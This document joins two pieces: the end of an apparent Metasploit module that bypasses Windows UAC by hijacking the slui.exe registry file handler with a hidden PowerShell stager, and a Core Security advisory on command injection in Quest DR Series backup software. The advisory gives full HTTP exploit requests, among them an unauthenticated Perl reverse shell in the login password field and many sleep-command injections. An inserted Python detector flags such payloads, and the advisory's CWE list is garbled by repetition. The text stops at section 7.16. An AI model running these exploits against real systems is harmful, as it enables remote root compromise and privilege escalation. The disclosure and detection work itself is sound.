          (.exe) application is launched. But slui.exe is an auto-elevated binary that is vulnerable
          to file handler hijacking. When we run slui.exe with changed Registry key
          (HKCU:\Software\Classes\exefile\shell\open\command), it will run our custom command as Admin
          instead of slui.exe.

          The module modifies the registry in order for this exploit to work. The modification is
          reverted once the exploitation attempt has finished.

          The module does not require the architecture of the payload to match the OS. If
          specifying EXE::Custom your DLL should call ExitProcess() after starting the
          payload in a different process.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'bytecode-77', # UAC bypass discovery and research
          'gushmazuko'   # MSF & PowerShell module
        ],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Targets' => [
          ['Windows x86', { 'Arch' => ARCH_X86 }],
          ['Windows x64', { 'Arch' => ARCH_X64 }]
        ],
        'DefaultTarget' => 0,
        'References' => [
          ['URL', 'https://github.com/bytecode-77/slui-file-handler-hijack-privilege-escalation'],
          ['URL', 'https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass.ps1']
        ],
        'DisclosureDate' => 'Jan 15 2018'
      )
    )
  end

  def check
    if sysinfo['OS'] =~ /Windows (8|10)/ && is_uac_enabled?
      CheckCode::Appears
    else
      CheckCode::Safe
    end
  end

  def exploit
    # Validate that we can actually do things before we bother
    # doing any more work
    check_permissions!

    commspec = 'powershell'
    registry_view = REGISTRY_VIEW_NATIVE
    psh_path = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"

    # Make sure we have a sane payload configuration
    if sysinfo['Architecture'] == ARCH_X64
      if session.arch == ARCH_X86
        # On x64, check arch
        commspec = '%WINDIR%\\Sysnative\\cmd.exe /c powershell'
        if target_arch.first == ARCH_X64
          # We can't use absolute path here as
          # %WINDIR%\\System32 is always converted into %WINDIR%\\SysWOW64 from a x86 session
          psh_path = "powershell.exe"
        end
      end
      if target_arch.first == ARCH_X86
        # Invoking x86, so switch to SysWOW64
        psh_path = "%WINDIR%\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe"
      end
    else
      # if we're on x86, we can't handle x64 payloads
      if target_arch.first == ARCH_X64
        fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System')
      end
    end

    if !payload.arch.empty? && (payload.arch.first != target_arch.first)
      fail_with(Failure::BadConfig, 'payload and target should use the same architecture')
    end

    case get_uac_level
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
         UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
         UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
      fail_with(Failure::NotVulnerable,
                "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
    when UAC_DEFAULT
      print_good('UAC is set to Default')
      print_good('BypassUAC can bypass this setting, continuing...')
    when UAC_NO_PROMPT
      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
      shell_execute_exe
      return
    end

    payload_value = rand_text_alpha(8)
    psh_path = expand_path(psh_path)

    template_path = Rex::Powershell::Templates::TEMPLATE_DIR
    psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded)

    if psh_payload.length > CMD_MAX_LEN
      fail_with(Failure::None, "Payload size should be smaller than #{CMD_MAX_LEN} (actual size: #{psh_payload.length})")
    end

    # The (Default) command only holds a short stager; the payload itself is stored
    # in a separate value of the same key and read back with Get-ItemProperty.
    psh_stager = "\"IEX (Get-ItemProperty -Path #{SLUI_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\""
    cmd = "#{psh_path} -nop -w hidden -c #{psh_stager}"

    # Remember what was there so the cleanup below can restore it.
    existing = registry_getvaldata(SLUI_WRITE_KEY, EXEC_REG_VAL, registry_view) || ""
    exist_delegate = !registry_getvaldata(SLUI_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view).nil?

    if existing.empty?
      registry_createkey(SLUI_WRITE_KEY, registry_view)
    end

    print_status("Configuring payload and stager registry keys ...")
    unless exist_delegate
      registry_setvaldata(SLUI_WRITE_KEY, EXEC_REG_DELEGATE_VAL, '', EXEC_REG_VAL_TYPE, registry_view)
    end

    registry_setvaldata(SLUI_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view)
    registry_setvaldata(SLUI_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view)

    # Calling slui.exe through cmd.exe allow us to launch it from either x86 or x64 session arch.
    cmd_path = expand_path(commspec)
    cmd_args = expand_path("Start-Process #{SLUI_PATH} -Verb runas")
    print_status("Executing payload: #{cmd_path} #{cmd_args}")

    # We can't use cmd_exec here because it blocks, waiting for a result.
    client.sys.process.execute(cmd_path, cmd_args, 'Hidden' => true)

    # Wait a couple of seconds to give the payload a chance to fire before cleaning up
    # TODO: fix this up to use something smarter than a timeout?
    sleep(3)

    handler(client)

    print_status("Cleaning ...")
    unless exist_delegate
      registry_deleteval(SLUI_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view)
    end
    if existing.empty?
      registry_deletekey(SLUI_DEL_KEY, registry_view)
    else
      registry_setvaldata(SLUI_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view)
    end
    registry_deleteval(SLUI_WRITE_KEY, payload_value, registry_view)
  end

  def check_permissions!
    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
    end
    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
    # Check if you are an admin
    # is_in_admin_group can be nil, true, or false
    print_status('UAC is Enabled, checking level...')
    vprint_status('Checking admin status...')
    admin_group = is_in_admin_group?
    if admin_group.nil?
      print_error('Either whoami is not there or failed to execute')
      print_error('Continuing under assumption you already checked...')
    else
      if admin_group
        print_good('Part of Administrators group! Continuing...')
      else
        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
      end
    end

    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
    end
  end
end

Quest DR Series Disk Backup Software 4.0.3 Code Execution

Core Security – Corelabs Advisory
http://corelabs.coresecurity.com/

Quest DR Series Disk Backup Multiple Vulnerabilities

1. *Advisory Information*

Title: Quest DR Series Disk Backup Multiple Vulnerabilities
Advisory ID: CORE-2018-0002
Advisory URL:
http://www.coresecurity.com/advisories/quest-dr-series-disk-backup-multiple-vulnerabilities
Date published: 2018-05-31
Date of last update: 2018-05-22
Vendors contacted: Quest Software Inc.
Release mode: Forced release

2. *Vulnerability Information*

Class: Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Execution with Unnecessary Privileges [CWE-250], Execution with
Unnecessary Privileges [CWE-250], Execution with Unnecessary Privileges
[CWE-250], Execution with Unnecessary Privileges [CWE-250], Execution with
Unnecessary Privileges [CWE-250], Execution with Unnecessary Privileges
[CWE-250]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-11143, CVE-2018-11144, CVE-2018-11145, CVE-2018-11146,
CVE-2018-11147, CVE-2018-11148, CVE-2018-11149, CVE-2018-11150, CVE-2018-11151,
CVE-2018-11152, CVE-2018-11153, CVE-2018-11154, CVE-2018-11155, CVE-2018-11156,
CVE-2018-11157, CVE-2018-11158, CVE-2018-11159, CVE-2018-11160, CVE-2018-11161,
CVE-2018-11162, CVE-2018-11163, CVE-2018-11164, CVE-2018-11165, CVE-2018-11166,
CVE-2018-11167, CVE-2018-11168, CVE-2018-11169, CVE-2018-11170, CVE-2018-11171,
CVE-2018-11172, CVE-2018-11173, CVE-2018-11174, CVE-2018-11175, CVE-2018-11176,
CVE-2018-11177, CVE-2018-11178, CVE-2018-11179, CVE-2018-11180, CVE-2018-11181,
CVE-2018-11182, CVE-2018-11183, CVE-2018-11184, CVE-2018-11185, CVE-2018-11186,
CVE-2018-11187, CVE-2018-11188, CVE-2018-11189, CVE-2018-11190, CVE-2018-11191,
CVE-2018-11192, CVE-2018-11193, CVE-2018-11194

3. *Vulnerability Description*

Quest’s website states that:

“The Quest DR Series of disk backup appliances [1] are engineered to handle
hundreds of incoming backup streams with an all-inclusive software solution
that simplifies management of backups, giving you more time to focus on
other tasks.

The appliances work in conjunction with backup software applications to
ensure data written to disks is protected for reliable recovery. New
features such as storage groups, secure erase and user management give you
the flexibility to tailor utilization policies to fit your organization’s
specific requirements.

With Quest DR Series appliances, you can:

– Back up more of your servers and applications – with support for more
than 15 backup applications and enhanced security features such as
encryption at rest and secure erase.

– Store less backup data – using variable block, in-line deduplication
and compression to lower backup storage requirements by an average of
20:1 at an average cost of $.05 – $.17/GB.

– Perform better during data ingest and management – with built-in
accelerators, logical storage groups and support for Fibre Channel
connectivity and virtual tape libraries (VTLs).”

Multiple vulnerabilities were found in the Quest DR Series Disk Backup
software that would allow remote attackers to execute arbitrary system
commands on the appliance with root permissions.

Note: This advisory has limited details on the vulnerabilities because,
during an attempted coordinated disclosure process for another advisory,
Quest advised us not to distribute our original findings to the public or
else they would take legal action.
Quest’s definition of “responsible disclosure” can be found at
https://support.quest.com/essentials/reporting-security-vulnerability.

CoreLabs has been publishing security advisories since 1997 and believes
in coordinated disclosure and good faith collaboration with software vendors
before disclosure to help ensure that a fix or workaround solution is
ready and available when the vulnerability details are publicized. We
believe that providing technical details about each finding is necessary
to provide users and organizations with enough information to understand
the implications of the vulnerabilities against their environment and,
most importantly, to prioritize the remediation activities aiming at
mitigating risk.

We regret Quest’s posture on disclosure and the impossibility of agreeing on
a coordinated publication date, something we achieve (and have achieved)
with many vendors as part of our coordinated disclosure practices.

4. *Vulnerable Packages*

. Quest DR Series Disk Backup Software 4.0.3
Other products and versions might be affected, but they were not tested.

5. *Vendor Information, Solutions and Workarounds*

Quest has released build 4.0.3.1, which addresses the reported
vulnerabilities. The build can be downloaded at:

. For DR4300e, DR4300, and DR6300:
https://support.quest.com/download-install-detail/6085865
. For DR4000, DR4100, DR6000:
https://support.quest.com/download-install-detail/6085802

For more details, Quest published the following Release Note:
https://support.quest.com/technical-documents/dr-series-software/4.0.3.1/release-notes/

6. *Credits*

These vulnerabilities were discovered and researched by Maximiliano Vidal
from Core Security Consulting Services. The publication of this advisory was
coordinated by Leandro Cuozzo from Core Advisories Team.

7. *Technical Description / Proof of Concept Code*

Multiple command injection vulnerabilities were found in the DR appliance
software, which provides a web interface to manage system configuration.
Clients make use of the site features via its exposed JSON-RPC API.

The product only provides SSH access to administrators inside a restricted
rbash environment. Administrators are able to execute a small number of
utilities, most of which are replicated in the web console.

We present the most critical issue in section 7.1, which would allow a
remote unauthenticated attacker to execute arbitrary system commands.

Sections 7.2 to 7.46 describe other command injection vectors that require
the attacker to have a valid authentication token.

Finally, six privilege escalation vulnerabilities are described from section
7.47 to 7.52 that would allow an attacker executing commands as the web
server user to gain root privileges. Exploiting any of the command injection
vulnerabilities would grant the attacker the initial foothold from which to
escalate to root.

7.1. *Unauthenticated command injection on login*

[CVE-2018-11143]
The ‘Logon’ method is in charge of processing login requests. It is
possible for an unauthenticated attacker to execute arbitrary commands
via the ‘Password’ parameter.

The following proof of concept opens a reverse shell connection to
192.168.1.36 on port 12345 using Perl. The username must point to an
existing account on the system, so we set it to the hardcoded administrator
account that ships with the product.

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain
Content-Length: 336
Connection: close

{
  "jsonrpc": "2.0",
  "method": "Logon",
  "params": {
    "UserName": "administrator",
    "Password": "';perl -e 'use Socket;$i=\"192.168.1.36\";$p=12345;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};';echo '"
  },
  "id": 1
}
—–/

If Active Directory support is configured, then the attacker would also
be able to inject arbitrary commands into the username field.

7.2. *Command injection in the user update method*

[CVE-2018-11144]
An authenticated attacker can craft the values of various user update
properties to execute arbitrary commands on the system.

The following proof of concept injects a ‘sleep’ command in the ‘oldName’
parameter.

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5
Content-Length: 158
Connection: close

{
  "jsonrpc": "2.0",
  "method": "update",
  "params": {
    "classname": "DRUsers",
    "user": {
      "oldName": ";sleep 10; echo",
      "Name": "pepito",
      "oldRoles": ["PepitoRole"]
    }
  },
  "id": 1
}
—–/
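A triage helper for the JSON-RPC request bodies shown in 7.1 and 7.2, added here as an example and not part of the advisory or the product: it walks every string parameter under `params` and reports those carrying shell metacharacters, redacting password-like fields so the alert itself does not leak credentials. The sample requests are constructed to mirror the PoCs; no captured traffic is embedded.

```python
"""Triage helper for JSON-RPC request bodies sent to /ws/v1.0/jsonrpc.

Every PoC in this advisory smuggles a shell command into a string parameter
(params.Password, params.user.oldName, params.c_name, ...). This walker flags
any string leaf under "params" that carries a shell metacharacter, so a WAF
log or packet capture of the API endpoint can be triaged quickly.
"""
import json
import re
from typing import Any, Dict, List, Tuple

# Characters/sequences that terminate or chain a command once the value is
# interpolated into a shell command string by the server-side subroutine.
SHELL_META = re.compile(r"[;&|`\n]|\$\(")

# Fields whose values must never be written to a log: report the hit, not the value.
SENSITIVE_KEYS = {"password", "passphrase"}


def _string_leaves(node: Any, path: str) -> List[Tuple[str, str]]:
    """Return (json_path, value) for every string leaf beneath node."""
    leaves: List[Tuple[str, str]] = []
    if isinstance(node, dict):
        for key, value in node.items():
            leaves.extend(_string_leaves(value, f"{path}.{key}"))
    elif isinstance(node, list):
        for idx, value in enumerate(node):
            leaves.extend(_string_leaves(value, f"{path}[{idx}]"))
    elif isinstance(node, str):
        leaves.append((path, node))
    return leaves


def inspect_jsonrpc(body: str) -> Dict[str, Any]:
    """Parse one request body and list parameters carrying shell metacharacters."""
    try:
        req = json.loads(body)
    except json.JSONDecodeError:
        return {"method": None, "classname": None, "hits": [], "malformed": True}
    params = req.get("params") if isinstance(req, dict) else None
    if not isinstance(params, dict):
        params = {}
    hits = []
    for path, value in _string_leaves(params, "params"):
        if path == "params.classname":
            continue  # dispatch selector, not data handed to a command
        match = SHELL_META.search(value)
        if match is None:
            continue
        leaf = path.rsplit(".", 1)[-1].lower()
        shown = "<redacted>" if leaf in SENSITIVE_KEYS else value
        hits.append({"path": path, "value": shown, "metachar": match.group(0)})
    return {
        "method": req.get("method"),
        "classname": params.get("classname"),
        "hits": hits,
        "malformed": False,
    }


def triage(bodies: List[str]) -> List[str]:
    """One summary line per suspicious parameter, suitable for an alert."""
    out = []
    for body in bodies:
        r = inspect_jsonrpc(body)
        for h in r["hits"]:
            out.append(f"{r['classname'] or '-'}.{r['method']} {h['path']} "
                       f"metachar={h['metachar']!r}")
    return out


# Constructed samples modeled on sections 7.1 and 7.2 (not captured traffic).
SAMPLE_LOGON = json.dumps({
    "jsonrpc": "2.0", "method": "Logon",
    "params": {"UserName": "administrator", "Password": "';sleep 10; echo '"},
    "id": 1,
})
SAMPLE_UPDATE = json.dumps({
    "jsonrpc": "2.0", "method": "update",
    "params": {"classname": "DRUsers",
               "user": {"oldName": ";sleep 10; echo", "Name": "pepito",
                        "oldRoles": ["PepitoRole"]}},
    "id": 1,
})
SAMPLE_BENIGN = json.dumps({
    "jsonrpc": "2.0", "method": "add_new_container",
    "params": {"classname": "DRContainers", "connection_type": 5,
               "c_name": "nightly-backups"},
    "id": 1,
})

if __name__ == "__main__":
    for line in triage([SAMPLE_LOGON, SAMPLE_UPDATE, SAMPLE_BENIGN]):
        print(line)
```

The metacharacter set is deliberately narrow (no quotes) to keep false positives down on legitimate passwords; widen it if the appliance's parameters are known never to contain those characters.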

7.3. *Command injection in the user delete method*

[CVE-2018-11145]
An attacker would be able to inject system commands in the ‘user’ parameter
passed to the ‘delete’ method.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5
Content-Length: 102
Connection: close

{
  "jsonrpc": "2.0",
  "method": "delete",
  "params": {
    "classname": "DRUsers",
    "user": ";sleep 10; echo "
  },
  "id": 1
}
—–/

7.4. *Command injection in the set user password method*

[CVE-2018-11146]
Both the ‘update_pw’ and ‘setAdminPassword’ methods can be abused to
execute arbitrary system commands.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5
Content-Length: 138
Connection: close

{
  "jsonrpc": "2.0",
  "method": "update_pw",
  "params": {
    "classname": "DRUsers",
    "user": {
      "Roles": ["PepeRole"],
      "Name": ";sleep 10; echo "
    }
  },
  "id": 1
}
—–/

7.5. *Command injection in the add_new_container method*

[CVE-2018-11147]
Data backed up to DR Series appliances are handled as virtual shares or
containers.

The proof of concept injects a ‘sleep’ command in the ‘c_name’ parameter
passed to the vulnerable ‘add_new_container’ method.

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5
Content-Length: 142
Connection: close

{
  "jsonrpc": "2.0",
  "method": "add_new_container",
  "params": {
    "classname": "DRContainers",
    "connection_type": 5,
    "c_name": "; sleep 10; echo "
  },
  "id": 1
}
—–/

7.6. *Command injection in the update_container method*

[CVE-2018-11148]
The method in charge of updating containers is also vulnerable to command
injection.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5
Content-Length: 141
Connection: close

{
  "jsonrpc": "2.0",
  "method": "update_container",
  "params": {
    "classname": "DRContainers",
    "connection_type": 5,
    "c_name": "; sleep 10; echo "
  },
  "id": 1
}
—–/

7.7. *Command injection in the setCleaner method*

[CVE-2018-11149]
The DR series administrator guide recommends performing scheduled disk
space reclamation operations as a method for recovering disk space from
the system. The subroutine in charge of setting this schedule was found
to be vulnerable to command injection.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 124
Connection: close

{
  "jsonrpc": "2.0",
  "method": "setCleaner",
  "params": {
    "classname": "DRSchedules",
    "schedules": [{
      "day": "; sleep 10; #"
    }]
  },
  "id": 1
}
—–/

7.8. *Command injection in the setReplication method*

[CVE-2018-11150]
The DR Series system uses an active form of replication that lets you
configure a primary-backup scheme. The subroutine in charge of configuring
the replication schedule was found to be vulnerable to command injection.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 117
Connection: close

{
  "jsonrpc": "2.0",
  "method": "setReplication",
  "params": {
    "classname": "DRSchedules",
    "container": "; sleep 10; #"
  },
  "id": 1
}
—–/

7.9. *Command injection in the setResetOptions method*

[CVE-2018-11151]
The DR series system GUI allows an administrator to configure password
reset options, which amounts to enabling or disabling the ‘Forgot your
password’ link on the logon page. The subroutine that implements this
functionality was found to be vulnerable to command injection via the
‘admin_email’ and ‘relay_host’ request parameters.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 119
Connection: close

{
  "jsonrpc": "2.0",
  "method": "setResetOptions",
  "params": {
    "classname": "DRPassword",
    "admin_email": "; sleep 10; #"
  },
  "id": 1
}
—–/

7.10. *Command injection in the set_compression method*

[CVE-2018-11152]
The appliance allows configuring several compression levels for each
storage group. The subroutine that sets the level of compression was
found to be vulnerable to command injection.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 127
Connection: close

{
  "jsonrpc": "2.0",
  "method": "set_compression",
  "params": {
    "classname": "DRCompression",
    "compressionLevel": "; sleep 10; #"
  },
  "id": 1
}
—–/

7.11. *Command injection in the license delete method*

[CVE-2018-11153]
The JSON-RPC API exposes several methods to operate with system licenses,
several of which are vulnerable to command injection issues. The ‘delete’
subroutine can be exploited by crafting the value of the ‘serviceTag’
request parameter.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 108
Connection: close

{
  "jsonrpc": "2.0",
  "method": "delete",
  "params": {
    "classname": "DRLicense",
    "serviceTag": "; sleep 10; #"
  },
  "id": 1
}
—–/

7.12. *Command injection in the registerDR2000v method*

[CVE-2018-11154]
The ‘registerDR2000v’ method is part of the licensing system. This
subroutine is vulnerable to command injection via the ‘LicenseServer’,
‘AdminName’, ‘Email’, ‘CompanyName’ and ‘Comments’ request parameters.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 133
Connection: close

{
  "jsonrpc": "2.0",
  "method": "registerDR2000v",
  "params": {
    "classname": "DRLicense",
    "dr2000v": {
      "LicenseServer": "; sleep 10; #"
    }
  },
  "id": 1
}
—–/

7.13. *Command injection in the updateRegisterDR2000v method*

[CVE-2018-11155]
The ‘updateRegisterDR2000v’ subroutine is yet another vulnerable method
offered by the license management API.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 139
Connection: close

{
  "jsonrpc": "2.0",
  "method": "updateRegisterDR2000v",
  "params": {
    "classname": "DRLicense",
    "dr2000v": {
      "LicenseServer": "; sleep 10; #"
    }
  },
  "id": 1
}
—–/

7.14. *Command injection in the email relay host update method*

[CVE-2018-11156]
The appliance can be configured to use an external mail server for sending
email alerts. The subroutine implementing this functionality was found to
be vulnerable to command injection via the ‘hostname’ request parameter.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 114
Connection: close

{
  "jsonrpc": "2.0",
  "method": "update",
  "params": {
    "classname": "DREmailRelayHost",
    "hostname": "'; sleep 10; #"
  },
  "id": 1
}
—–/

7.15. *Command injection in the join domain method*

[CVE-2018-11157]
A DR series system can be joined to a Microsoft Active Directory Services
domain. This functionality is exposed by the ‘ActiveDirectoryService’
module. An attacker can inject system commands in the ‘domain’ parameter
passed to the ‘join’ method.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 152
Connection: close

{
  "jsonrpc": "2.0",
  "method": "join",
  "params": {
    "classname": "DRActiveDirectory",
    "username": "pepe",
    "password": "pepito",
    "domain": "; sleep 10; #"
  },
  "id": 1
}
—–/

7.16. *Command injection in the add storage method*

[CVE-2018-11158]
